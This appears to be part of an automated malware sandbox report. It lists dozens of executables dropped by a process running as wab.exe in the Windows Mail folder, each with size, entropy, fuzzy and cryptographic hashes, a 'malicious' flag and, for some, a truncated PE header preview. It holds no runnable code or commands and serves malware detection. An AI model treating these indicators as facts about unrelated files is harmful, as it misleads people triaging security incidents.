                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1252432
                                                                              Entropy (8bit):6.722333632620241
                                                                              Encrypted:false
                                                                              SSDEEP:24576:j0n7Ubxk/uRvJqLGJLQ4a56duA/85RkV4l7/ZeoMOp:o4iwwGJra0uAUfkVy7/ZX
                                                                              MD5:807BDA887A05224A70C5F1AF88260DC0
                                                                              SHA1:40730E1667845DF510113D6A477BEDC0ACEE36CB
                                                                              SHA-256:72AD734C38933328D519289803AD0B298949FD607A90DBB31D6D04CE39514A90
                                                                              SHA-512:4BD27971FE05BAE431C2EF948265F457DB368331860B6DDB5C96F6DF5BB09F5548C737315EA2D7ECBF81E3E8885AF26D61ED95F4C050DFD8BE833ABD06733BB9
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):790096
                                                                              Entropy (8bit):6.685520086044301
                                                                              Encrypted:false
                                                                              SSDEEP:12288:lMvcR0D0B6PyxoxIlZwM+R6R4uFjs1Z7FMN0TzJqccvbXkN58AuimIh:dR0gB6axoCfyR6RLQRF/TzJqe58BimIh
                                                                              MD5:611DE7B526AD3AD4E09E47C1B86367D9
                                                                              SHA1:583621B2438FAF2B485C7D4FBEF403747CD57EEF
                                                                              SHA-256:A62D1854968811331942010168652BB4C33F2EAC89067A91AA70F16D711FE2E2
                                                                              SHA-512:04296781297F2F306E0DF63EDD314979DD37EBAF334D6E58DE9DA8BA095C3BA8210E8A4A4EFBB8A51CEC06B9DE12B659F431056648558C792A80D167DE975728
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):562776
                                                                              Entropy (8bit):6.325980130189127
                                                                              Encrypted:false
                                                                              SSDEEP:6144:s0dzerObMhDGJ9UM3sunrXj9BMHmD1tYFLqY/W5R02qO7VKCy7KCzDSEBPj:beqbWqB3sunrT9+aYFLq3ny7JSEBPj
                                                                              MD5:ADA3590FA13D77AF34248A7A04D577C4
                                                                              SHA1:5016D3685BB6571982250A3B8414BB002408CB32
                                                                              SHA-256:6CDB640EE5BDA123CFEF08A8E423851C050CEA0784ECB9BFEF50D07C17F01A5A
                                                                              SHA-512:669E54F4C248B265DC8C422E642B79DB44C60051F7782258A9B8A0725170E7229CE4BFD48F5980BD6C099096F7DE91B3ADDE32D6098D099B5BF2CC5FDB0DD426
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):127512
                                                                              Entropy (8bit):5.882565985204679
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkQPo10JOSdnvEhEyr1hg9uCRFRzsxeZ:ng1MOc81hmRFJs0Z
                                                                              MD5:2410DBD92B226D1A105A7DD336B7E89B
                                                                              SHA1:4A75AE111CC58ED86D157D69C139AEE5D5753B3D
                                                                              SHA-256:87102C0F0150FDF75EF59A2E9B83BF9FD5A82A333AEBA3E64FF0CEBF1C9CE326
                                                                              SHA-512:96BB8E23F7A78FE9E335A3AB17B78F6B33D85E6EAC34CD8096EC7C98EAA3B1233442566903A56F6DE0CAD915EC097CC9146F7E43D0DEC1E31AFA2F193020212F
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):299136
                                                                              Entropy (8bit):6.630224066462407
                                                                              Encrypted:false
                                                                              SSDEEP:6144:s0LYbH0QQchx73BeFStIhEWDoZvynCMj+TwW:s0EbH0j4x7R6SvyCMqn
                                                                              MD5:4839E0285791329EE319914A14C4C058
                                                                              SHA1:CF7469B3BBAB3EF5E287376DBA5DCC92D581D109
                                                                              SHA-256:06566B85A4C8B77CF33EE7F9D7481F8AA6E50FC52EFBA3FE103E3AFC01373FF6
                                                                              SHA-512:D24B83666C2DE41C8C486DEF297C1A0E0B1D863B56A326B743ECAC49AE66D745F61ECCAD3E9A3BE87A84072641F200429DEFB546622D59095637B3115E3D945C
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):299136
                                                                              Entropy (8bit):6.632805023719349
                                                                              Encrypted:false
                                                                              SSDEEP:6144:slXCs7zYA9xiNFiVg7s/uDoeBvhI7W6w9:slXCs/YAh/elvhI7Wd
                                                                              MD5:EBA58103571EA9B107B0F846E6C5A2E7
                                                                              SHA1:1318DB16558A362755692C6B3A4F9786F5A3CD38
                                                                              SHA-256:66AAA70758C1DD448D8456020D009BFB73003B460DDBEA7F230EE0847725ED07
                                                                              SHA-512:A2CF3E8EF91B8AA0834D349DA92E43FCB1696C1B404A3F0030627CE08C9A6C81E3AAF33290303545709674FDBDBAF84B22CABCFAC3F7ABB43316AFF0D97D0A32
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):437888
                                                                              Entropy (8bit):6.304281817676703
                                                                              Encrypted:false
                                                                              SSDEEP:12288:sGNKdHVnfiMB7yIL+5IyoiYv5jPaeTmJWIvDxT9ULX8PCM:fKiBLZ05jNTmJWExixM
                                                                              MD5:9547D26AD745DF9D0CCE708C32590984
                                                                              SHA1:146AE790CEDE84FA4B245D08B8F057354E39474C
                                                                              SHA-256:1C79C49A37F32710C7ADDD49922A42E735296E22BA5E22A447AD4C6E4539CA13
                                                                              SHA-512:85647396FD75D0C64909DE73904419835E5A92F120DB9D592777E304314868D01E867CFC4D6CDDA56391CBF34F1B6420FA1CF7E4742D642416F72994A6ACD073
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):343328
                                                                              Entropy (8bit):6.499135917181153
                                                                              Encrypted:false
                                                                              SSDEEP:6144:okTpB8HHvBjruphfgesnAhAOQp2EwckjQx+m8zhPLlZp3:oklinJruphfg26p2Ewix+m8Nln3
                                                                              MD5:B0A00074F3B1720E1C604BE0552617EA
                                                                              SHA1:DB37A895170BBDA9CC760751028C7C0735392DA3
                                                                              SHA-256:284DBBCA777F4345B9863AC13E44E9430D699214EFB86A86940CE5DD0340587D
                                                                              SHA-512:FC3A9014266BBDA5AB0AA1A00FEF9096A42B61B8D512045D90B0C702EAFB4A02A5683D686FC962EDF7D88DC48D50E28C16CB1187AEC032D08EC543BD8A4AF1D9
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):443680
                                                                              Entropy (8bit):6.273434344232977
                                                                              Encrypted:false
                                                                              SSDEEP:12288:V3gaHC2zUM2WJoROZVXk8hbodzbaw8x0Cx+wnx:Vx5k8hb0Haw+x5x
                                                                              MD5:8131AEDBC96AF343D27A37721104C7BA
                                                                              SHA1:169AC23A617F55EC5F1CD091B8C202FA8C145503
                                                                              SHA-256:FB7BFAF4B58771A348415FCC6E4122ABCA4082C3328A7CBFFEA57215A9C5E005
                                                                              SHA-512:3D8BAB13EFB2F919677EF26C1C1177BB0FD4C434325B60636C47B9C543061B41C6860912DD18CFF4133A4D27D2C608216682BE25B7B4B79C5DCB03D7A67D5378
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):203552
                                                                              Entropy (8bit):5.824786358578104
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkCaKavT/DvbEvK9aobNI2B+Nl4jz+b0atWH1TmFtotpcat8iKdlVST31OK8sws:5aK2h9H/B+rEtiPC
                                                                              MD5:9ABF58ADF874CBD3B1C98C5A8C00952C
                                                                              SHA1:384560927BED37C8EA188EA513564D6A5D963BC9
                                                                              SHA-256:7D83AF575B7894583D69E20CDD399EB544D332C954FCB12AEB43A5A6F1DAC047
                                                                              SHA-512:0A6BC7A997199CB5C9143CF3F43BE8B81E40B58D6AF9DEE68E9919B81253837BC2FD6E68FFB1CDA24AF7BB2F16BE6125842461F2B11E702A74B150A1D236F90A
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):149792
                                                                              Entropy (8bit):6.130839286683668
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk34vzT+PjZpsB+2h+EOXkMxJ7Rfp8K172YPrp:kpsB+09zMH7cCxPd
                                                                              MD5:DDB50C235FC41D325CA396E4DADB7D03
                                                                              SHA1:78447DA5E4E2A5B956AAF7EB1D78381BD18B276A
                                                                              SHA-256:788B5CA09B6419BF4676C910284222425739E975D3933C7A797A6F7374B1CF4D
                                                                              SHA-512:BE2091EFC648E42A85E7849A10016AC5F207972C856BF38585E214F6C3A24226D976AA75C93CA6EDD3EFB03A28D65F1FF1B21F8EA2685FA2DB8FC4855CE5D25C
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):227104
                                                                              Entropy (8bit):5.96400865851122
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkmWt9h8QlLISqG+T1Dpd9qEKLmoY46WeJ2B+O3dnDiani3F8I1rXRA/:9Wt9h8QlLISZWVRohcq7dvni3F8QrBA/
                                                                              MD5:0E040A535A5DAEE44210398E9D623F8A
                                                                              SHA1:68EAF347AF330274DCCC0163AF3B7BED78FA5130
                                                                              SHA-256:B1C1D4C7B6831A94636669F6FEEA80A8E74BDCA5AFCF9353E8530F48A903E3A9
                                                                              SHA-512:867BCC2EE42376C1EFE28A1CDDF55F4363BF058308D0D1DCDF741F6BF48E7201912B9666D30C9E8D75FFEA836BF17E1B4241CE913506FBA3EE48B08523B7D886
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):264480
                                                                              Entropy (8bit):6.442315114933131
                                                                              Encrypted:false
                                                                              SSDEEP:6144:7wCtJmRqyFmB6AOKmiMGwIAfx+iQ+FfFyLgG1da6edo:7w6JmRI6Bitwpx+iQafFykG1da6edo
                                                                              MD5:3396F7DBBB1ED342742ACAD901459B6B
                                                                              SHA1:43BF682467DC7EE333A6FF5DFF7E44C26A522C31
                                                                              SHA-256:748DB965A420E06E4439E26B26729B52CB38A8EC1170912EFFE56EB4331EBACE
                                                                              SHA-512:C04F847FFF847251C182647680041DCC9CF4706A2C4C0EA0F2294A1085880BD01D2154D06C714310D8D604402B6B316428BF9A6A9193DB3E8CDC7CCFA48865AB
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):149792
                                                                              Entropy (8bit):6.131209533569252
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkr4qR8vSZksB+2hdqecER5AhC48S1m2YPrZ:IksB+0YlEXAe6QPt
                                                                              MD5:0F315CC3D7FC51F663E1A006F0BFDBDB
                                                                              SHA1:59A12C582E0D917D4973FF3A79604869101CB322
                                                                              SHA-256:2948901E015CA1C99F320EF6FA7EB3AE4C21019DBFAD3512D6C88BACF2179229
                                                                              SHA-512:320E0A4E1F548B1DAA5D3675D8910ED135D0142BCD6A661C8E0D123A0368DF870B6110EE2DED79354C96F3EC23038C4F9E2DA2C9B5E3B483D0F6B0B40F7C5574
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):299136
                                                                              Entropy (8bit):6.630224066462407
                                                                              Encrypted:false
                                                                              SSDEEP:6144:s0LYbH0QQchx73BeFStIhEWDoZvynCMj+TwW:s0EbH0j4x7R6SvyCMqn
                                                                              MD5:4839E0285791329EE319914A14C4C058
                                                                              SHA1:CF7469B3BBAB3EF5E287376DBA5DCC92D581D109
                                                                              SHA-256:06566B85A4C8B77CF33EE7F9D7481F8AA6E50FC52EFBA3FE103E3AFC01373FF6
                                                                              SHA-512:D24B83666C2DE41C8C486DEF297C1A0E0B1D863B56A326B743ECAC49AE66D745F61ECCAD3E9A3BE87A84072641F200429DEFB546622D59095637B3115E3D945C
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):135808
                                                                              Entropy (8bit):5.942801479985879
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoQrmKWGyeVK7qjh3rmKPNbS7cZPxyqPEoCW/ids8nBs+s8nBs8m:/rkpqsyutjZqMNbSgxbFrj8m
                                                                              MD5:1F06DC6B1D2291AE551234B3109FA2FE
                                                                              SHA1:0BEA3FB19461017340CA691040D8E3A36F5FE4EF
                                                                              SHA-256:D7FBD9840C2638B6C3B02BED388863AC27D3DFCB09E50F056868E5CC85F8EE0B
                                                                              SHA-512:579F76483C73D69ABCAD7CA4B36D2E920A7B81897F95C17E782EAA791783855A37C271CD9A236ED366BE67618D4B443D2D941F69DEC037A101FAB47443418FF0
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):299136
                                                                              Entropy (8bit):6.632805023719349
                                                                              Encrypted:false
                                                                              SSDEEP:6144:slXCs7zYA9xiNFiVg7s/uDoeBvhI7W6w9:slXCs/YAh/elvhI7Wd
                                                                              MD5:EBA58103571EA9B107B0F846E6C5A2E7
                                                                              SHA1:1318DB16558A362755692C6B3A4F9786F5A3CD38
                                                                              SHA-256:66AAA70758C1DD448D8456020D009BFB73003B460DDBEA7F230EE0847725ED07
                                                                              SHA-512:A2CF3E8EF91B8AA0834D349DA92E43FCB1696C1B404A3F0030627CE08C9A6C81E3AAF33290303545709674FDBDBAF84B22CABCFAC3F7ABB43316AFF0D97D0A32
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):437888
                                                                              Entropy (8bit):6.304281817676703
                                                                              Encrypted:false
                                                                              SSDEEP:12288:sGNKdHVnfiMB7yIL+5IyoiYv5jPaeTmJWIvDxT9ULX8PCM:fKiBLZ05jNTmJWExixM
                                                                              MD5:9547D26AD745DF9D0CCE708C32590984
                                                                              SHA1:146AE790CEDE84FA4B245D08B8F057354E39474C
                                                                              SHA-256:1C79C49A37F32710C7ADDD49922A42E735296E22BA5E22A447AD4C6E4539CA13
                                                                              SHA-512:85647396FD75D0C64909DE73904419835E5A92F120DB9D592777E304314868D01E867CFC4D6CDDA56391CBF34F1B6420FA1CF7E4742D642416F72994A6ACD073
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):163456
                                                                              Entropy (8bit):5.9115526693507805
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk6446dewltB2mNd/HOrveW1dexk834fRZ5Nyc:r446d7T/H4X
                                                                              MD5:D1AF6B8FE233EC36D374D8A19B6CF350
                                                                              SHA1:54763AEFB38E704722815851C81CCF785A157345
                                                                              SHA-256:F93DA943A2FFB890D923439A90A7AD11C44D4385426E4AE7B50BA3CCAA271C0A
                                                                              SHA-512:41A1C1C56AFEA4805A857F5CD7D58C2DD15142003388A93378E63D5F5B5A9206AA78F43F084D1B57894D262F8A58507C33C202454E3D48D3DF7E82E63188FF04
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):127104
                                                                              Entropy (8bit):5.559603073488415
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoAs8nBs5s8nBskEsz2zy77hPxIAbBsnzA3QDkrDW8Kq5ns8nBsb:/rkkUkEsqzy7pxI8BszFJqkb
                                                                              MD5:A436A95C872F8E726BE28BD3F28FECA3
                                                                              SHA1:1B969154E933EE587DD09120290997AEAD912D07
                                                                              SHA-256:5E454A2DA6110838B52A0E2B6574C113898CBC987175F7DF2D25D91B9CBF3D39
                                                                              SHA-512:B7859034075CB8FCF718C85BA15864AD764BF615D38C592A584F1F03D1390317A43760EFEED1FCFF44677E90ABB943CA88891008B879277FC529AD24FC833F68
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):223360
                                                                              Entropy (8bit):5.817153710128924
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk6ySSyyXC2BZC5vHa2L8jv+UII6qS2AroAxYN35gwxcPXtxdTsVcCXFzlZBnD:ZSyMZOy406qS2AroAxnw6f9JCXN1
                                                                              MD5:0E90F4C1D272BDFD6BF6FFAD932C914F
                                                                              SHA1:E3979345722CFF61E13670F831832BD0071028C1
                                                                              SHA-256:F3BC6D48071C74BC60549F00E279DB05B5C95549745422198E362CE8714C443B
                                                                              SHA-512:852E831A8647F12D88A50260A0F3AF938AE6C7F41D0FAE08B6C8D811B848F41A7317F42618759B3FBFABC004A84D8F3AE5DA9AE5AC4CF8C0F85FF02C03843E8C
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):203264
                                                                              Entropy (8bit):6.382288995818921
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk2wl0hzyfN7T34oshWGrAUdaz2w9Lf0M/RHym:WiFIf34hcUsz225/
                                                                              MD5:A758FF4E11CABD90381BF2DF8C94A835
                                                                              SHA1:3CF64CC942DABBA8D259C1BBBCAD8A8A5758FAFD
                                                                              SHA-256:6E96E7D72730FEC7AE5FBE319E54618D70944803BF81CF43381A7FBA3CF213F3
                                                                              SHA-512:BEF5CECFF18253A3273CA2826AF4B30A373195A8F1ED638A23A87A22BC0EEC0140A498888265B123236315E734C872B459041AA68577CFB264A3ACA3AC521E7D
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):209912
                                                                              Entropy (8bit):6.052889138927242
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkIfSoD7sDZ7/E2jijQvZ2ha5ZxXHyz7weLSMqpmmtj:lfSoD7q/fji2SUKz7VHwmmtj
                                                                              MD5:4D184C059578DB44A1F50ECA0F228274
                                                                              SHA1:9287D8911E645F345F7F74856AA107E7811A059D
                                                                              SHA-256:7D7FC863434AAE54E99D74B8F16DAF0544382408D9476D85B2FCC6119DCBCF9A
                                                                              SHA-512:42F0F8508CBC8B5D6D9788DF8B3F690F5ADD6358B68691B80BCF18BB259865E8A34974F6539B930CF88BB2EC391003E52B83B201BD8BD7D870B17BC04F5D7AE4
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):209912
                                                                              Entropy (8bit):6.052889138927242
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkIfSoD7sDZ7/E2jijQvZ2ha5ZxXHyz7weLSMqpmmtj:lfSoD7q/fji2SUKz7VHwmmtj
                                                                              MD5:4D184C059578DB44A1F50ECA0F228274
                                                                              SHA1:9287D8911E645F345F7F74856AA107E7811A059D
                                                                              SHA-256:7D7FC863434AAE54E99D74B8F16DAF0544382408D9476D85B2FCC6119DCBCF9A
                                                                              SHA-512:42F0F8508CBC8B5D6D9788DF8B3F690F5ADD6358B68691B80BCF18BB259865E8A34974F6539B930CF88BB2EC391003E52B83B201BD8BD7D870B17BC04F5D7AE4
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):264144
                                                                              Entropy (8bit):5.5958416454167645
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkaPEGT3EB2e1aWGNU6ITL85x0HRerzJ0YF6OYLy0PPDq29BA+7891:vPEC0QjWGNU6ITL1H0zvjkBA+7891
                                                                              MD5:44E9513BAB2A6092C7CD0F427E1FEDB4
                                                                              SHA1:42DD7A45E394541E5741CFA40209724E01F50D7D
                                                                              SHA-256:E613392D586721152E8B8F90369A483B43EB6E15756FD90327BA2825C0FCD919
                                                                              SHA-512:93D991C50A228F6F20FB8D1C54AD82DF6409742A8C5BFC4030158CAEDA575C818EF317AA694F08F35112C4D2289FF12DDBD937F954137D5F799AA2476F27DFA2
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):430680
                                                                              Entropy (8bit):6.507043587745356
                                                                              Encrypted:false
                                                                              SSDEEP:6144:0mmt0fSoD7ZAOhPiURg/4KAaxZTTlvIfaUcuI4hWxBP9SGO0zyqEL:Jmt0LDdOUO42ZdocuI4kxBgGONqEL
                                                                              MD5:07C7EC19924DA741A70E2A34F6D38D1C
                                                                              SHA1:2FA274520A2DE8DF40E463DDB24B74E117250AC0
                                                                              SHA-256:5679106DE217223E2447D42372E4A17255BF639B15930856A8D15E25CE3E890A
                                                                              SHA-512:40FF7E018B6EE45F1C16736F692347B1BD7B29D809651AD4F95C8AEB4EB949743E9701ABF1DA31D8ACA34276985A554DFA39EECB6033C569EDFEF500A0302DE6
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4473576
                                                                              Entropy (8bit):6.558895341897284
                                                                              Encrypted:false
                                                                              SSDEEP:98304:/kkCqyDEY7+o3OBvfGVY+40yajyS+9s/pLOq:/kkCqaE68eV+0y8E6L1
                                                                              MD5:4855130B5C1085421920C85105178634
                                                                              SHA1:A33353F42A13A7250D66326F8770A286E5774729
                                                                              SHA-256:8624CD3947C884673C1090CCED557CDAC8075E120C1EB2EF4B9C01B694370AFA
                                                                              SHA-512:97D9889F9385DB775A685A62A52EC371BDEE291ECF4877DF0A6098F01F6BD5226452B3893C002A2914B9AE511837FF8090E6DB297C0CDFE3FADBE49A6101CFE6
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4316096
                                                                              Entropy (8bit):3.9033569901477474
                                                                              Encrypted:false
                                                                              SSDEEP:98304:9PNLniBaEJhRELqS/rhwov59SRZ5Vb9sybbsK+0rnsQ:JNLniBPJhRELqS/rhb59SRZ5Vb9sybb9
                                                                              MD5:A5CA18C848C5701C8854BB35BD56574A
                                                                              SHA1:005BF3164DF9CA7270124E3AF626845CFE1D09E8
                                                                              SHA-256:FD61D8809B0673D3B2E54A167F82F37B5345CD65285FACC8DA6C9EAFD6AD4524
                                                                              SHA-512:DEEF87CC41230B4888A7E0937C8A918B61186372B9ABE36069507C2E5B64976EE74439CA136907AFE11C23B737E8134E342F51412558B3E6CDA4A80610A1DE0E
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):94600
                                                                              Entropy (8bit):5.808950203405244
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VozELjOzHKd1XI/etzCJQx0cxnIO/IOmOe:/rkaE/OTKXI/etG8ICILJ
                                                                              MD5:92CCB6717B855AAB9FC8F2DD5704DF9E
                                                                              SHA1:A992665A3EED482629E382BA98CC00D29BD96B08
                                                                              SHA-256:7C5D9FF38A44CC39E7023D44A89B1B2F7CE3EDD4C7292C89E82018319BE3CF9B
                                                                              SHA-512:B267F5DB062B05E844D0AC159040CD2BC88257E05B47E70275AD3629DC0331CD53E113D0F4CF6E7105551F13D5DF3C8EBE1CA05E519D84DDD9FA523AE730C8C5
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):101496
                                                                              Entropy (8bit):5.614417533237859
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoDvpz3ktxGvpzvy5ZWGalHFmMTK0KRTS8bOzc:/rk2ToATzvmN0KRm8bOzc
                                                                              MD5:7F19345545B8DA667991DEEC3D8F6468
                                                                              SHA1:66EC1140DD4F3811E4E000E94340469CE42108B4
                                                                              SHA-256:FD49A52DE21C968484C90DEFEBE9B41A900C0C83D0578B931FFF41A02F6041B3
                                                                              SHA-512:898F2CCF7F289256A57278D79B9D9F0AFBAE6AEC3761404D00A3C1B98E0467188F33B6C4B0B19CC687DFEEFC2408F4A5D3C3D4FD3BAFA4FE258E922CFC52A76C
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):455760
                                                                              Entropy (8bit):5.80402506379432
                                                                              Encrypted:false
